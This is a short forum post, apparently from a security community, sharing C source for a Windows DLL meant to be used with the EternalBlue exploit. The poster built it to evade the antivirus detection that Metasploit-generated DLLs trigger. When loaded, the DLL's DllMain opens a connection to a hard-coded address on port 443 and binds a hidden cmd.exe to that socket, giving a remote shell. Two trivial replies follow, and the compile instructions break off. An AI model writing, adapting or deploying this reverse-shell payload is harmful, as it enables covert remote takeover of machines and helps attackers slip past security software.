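A while back, EternalBlue was all the rage. DLLs generated by msf get flagged by antivirus very easily, so I found some reverse-connect code online and pieced together a reverse-connect DLL version.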
```c
#pragma comment(lib,"Ws2_32.lib")
#include <WinSock2.h>
#include <stdlib.h>

WSADATA wsaData;
SOCKET Winsock;
SOCKET Sock;
struct sockaddr_in hax;
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi("443"));
    hax.sin_addr.s_addr = inet_addr("192.168.2.13");
    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL);
    memset(&ini_processo, 0, sizeof(ini_processo));
    ini_processo.cb = sizeof(ini_processo);
    ini_processo.dwFlags = STARTF_USESTDHANDLES;
    ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
    CreateProcessA(NULL, "cmd.exe", TRUE, CREATE_NO_WINDOW, (LPSTARTUPINFOA)&ini_processo, &processo_info);
    return TRUE;
}
```
Compile with gcc (MinGW) as follows:
2 replies
I've found quite a few of these on my end too.
@ver007 So you're here too.